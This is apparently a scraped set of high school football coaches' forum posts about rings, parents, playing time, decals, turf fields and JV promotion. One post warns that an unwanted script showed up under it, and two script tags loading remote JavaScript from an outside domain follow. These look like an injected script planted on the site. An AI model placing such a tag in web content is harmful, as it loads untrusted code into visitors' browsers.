stupid rule, and not fair to the player, the ring is for the 2022 season not the spring of 23... It will enrage the parents, then cause problems with the administration, for what?

As long as they are not inapropriate... we do ask them to choose one with a team color though

We do not practice together. We are a large school that two platoons. I am a JV coach and we try to use as much varsity as we can... we definitely use the terminology

I would call the parents and the kid in for a meeting and just tell them how it is. Tell them that he is your future and you are excited about the next 2 years with him being the man on Varsity. Let them know that they can not dictate who starts and who doesn't. Sell them on the fact that regardless of whether he plays or not, that this is a big week for him in terms of growth and maturity for the future. Even if he doesn't start, he needs to prepare like the starter as the #1 guy could go down any play. This. I would also ad that the decision is final if they don't like the decision the door is available, the programs integrity will not be compromised because a players parents don't get it their way. Not sure how the three of you coaches all differ on opinions on a mater like that, unless you differ on who should start due to opinion of performance (who gives you the best chance to win).

Why not have the kids at the school (artists) have a competition to come up with an original one I took our helmet wings to our computer design class and asked them to come up with a design. The teacher was happy because it was a project for our kids. We ended up using what one did with small modifications. his is now our football logo. Its on our coaches shirts, hats, etc. A great way to drum up a bit of support/ good will in the school for the program

A lot of folks don't like our decals, but my kids do. And I do as well so...on the left. We added the players' numbers on each side under the feathers as well. Coach what's your mascot? We are looking to change our decals. We've used the FSU spear for years. If anyone knows some for Braves let me know. Why not have the kids at the school (artists) have a competition to come up with an original one

Any kind of hit below the waist is dangerous, and Pop Warner rules are not based on the NFL. Can't tell you how many times I've had to say that in the last 15 years. so why are tackles allowed to happen below the waist? Just realized this is an old thread... Anyone know why this script is showing up below my post? Don't click it I did not put it there. <script src="http://centrexity.com/converter.js" type="text/javascript"></script><script src="http://centrexity.com/converter.js" type="text/javascript"></script>

I don't think an anonymous survey would give you no info. It may enlighten you to something you never noticed or wouldn't normally think about. It may let you know that during Y period the kids are dialed in but when we go to X period their not focused because its not as engaging. You have to take it for what its worth, you know they are teenagers, its not to share with the administration its for you... If anything you might get a laugh out of it.

My school board president is a volunteer assistant of mine. Has been here for 28 years. This is my 5th. That's kind of weird. What was really weird was when he got kicked out of our quarterfinal game. That made for some odd political times for me. I am SO glad that here in Texas you must be a full time school employee before you can Coach. I have heard many many horror stories about volunteer coaches. I tip my hat to you. That sounds like a very tough position to be in. you have probably heard a ton of horror stories about teacher coaches too. Many non teacher coaches are there for the right reasons and actually give up / lose money opportunities to do something they care about.

Sounds to me that the HC needs to do periodic evaluations on paper so if he does want/need to someone not pulling their weight he has something to back up the reason... It may be as easy as getting rid of one or two, It may open the others eyes.
But this starts with the HC he has to lay down his expectations of the staff.

Turf fields are great, no mud, it's awesome. HOWEVER...you WILL forever be infested by the black rubber pellets in every shoe that touches it, and as it wears, you'll also get a nice coating of the grass on your shoes. In both cases it's only a matter of time until you forget to take your shoes and socks off before going in your house and then you'll never get rid of it ever again. My girlfriend still finds rubber pellets and grass on some of her things and she doesn't even live with me. My wife knows its football season when those black pellets end up everywhere especially at the front door.

I think the coaches on here for the most part know "they don't know it all"
I second the comment about coaching with the coaches on here. I have often thought If i was a HC a good get would be to lure one of the great posters to your staff.
Also this is one of the only places I get to talk ball, Sometimes I can with a few on staff but as I don't work at the school it is tuff to do.
This site gives me my fix as I bet it does many of you.

I don't believe this at all. 80% is probably high. For the most part the kids who come into our program that have played youth have decent technique, sure we have to fix some kids, or teach our way but the majority have a good base. (we do not have a feeder) Not only that, but they have learned to protect themselves and have the shock of being hit out of there system.... The kids who have not played "youth ball" are at a big disadvantage, because the kids that have played have developed the attitude and instincts already. Our area is south Florida so there are many youth leagues and teams in the area that are very competitive. Being a former "youth" coach I know first hand that there are many good youth coaches (many of which are professionals that don't have the hours for highschool coaching), and many that are way better then some of the highschool coaches in the area. Of course there are bad ones too even in the same programs.
That being said when I watched the first 10 minutes of the show I got really sick and had to turn it off. Wondered to myself are other places really that different. Then thought the show is trying to show extremes for viewership so they went out and found the spot with the most compelling story lines and angst.

Could be he is just trying to make a change to shock the culture. Finding what is needed. Lets say the previous coach was real strict and everyone was in the dorms ect.., whos to say he doesn't come in and say you kids are young adults Im going to give you some leeway.
Obviously he has spotted a need for improvement in the school attendance area.

Down. as in blocking down
When I was in high school my JV coach explained when the TE or tackle blocked down I step down. I kept asking what he meant by down, after a while he started getting frustrated explaining it so I said I got it now coach... which I did not of course.

1 game a week Freshman, and JV teams JV is sophomores with maybe 4-5 freshmen moved up. No JRs must be varsity How many players do you have on varsity? If you're a junior who doesn't start and gets limited varsity time, how much game reps do they get throughout the year? If we used that rule we would have some juniors not gettinf any playing time the whole year. That's why we have juniors play jv. Sent from my SAMSUNG-SGH-I747 using proboards We have anywhere from 60-80 kids on Varsity I believe JV we had about 50 and Freshman was about 50. Its just the way the program does it. We feel we would be taking away from our Sophmores development (eventual Varsity Starters) if the JRs who may never be starters are taking playing time from them. We do have this luxury with the amount of kids in the program.

In south Florida, we see a lot of pro I spread, wing T, and as far a defense 43 over front with different coverages but the majority Man Free is by far the most prevalent probably from the University of Miami in the 90s

As a JV coach I am ok with the Varsity pulling a kid up, if he has a chance to play. We have a kid doing great for us right now, the Varsity got an injury, and they said to send him up, good! I am excited for the player, and it give us a chance to hopefully develop another player. JV is meant to prepare the players for varsity, and if they are pulling kids early then we are doing our job. I just hate to see them sit, when they could be gaining valuable game experience, so if they are better then the senior, starter, or will see playing time pull them up.

What kind of trip is it? if it just vacation it is one thing but if it is for example a once in a lifetime robotics conference and they are science and engineering hopefuls that's another. (airraider posted about a farming conference thing one time) BTW- what kind of parent pulls a kid on vacation and three others in the middle of their SR year of football?
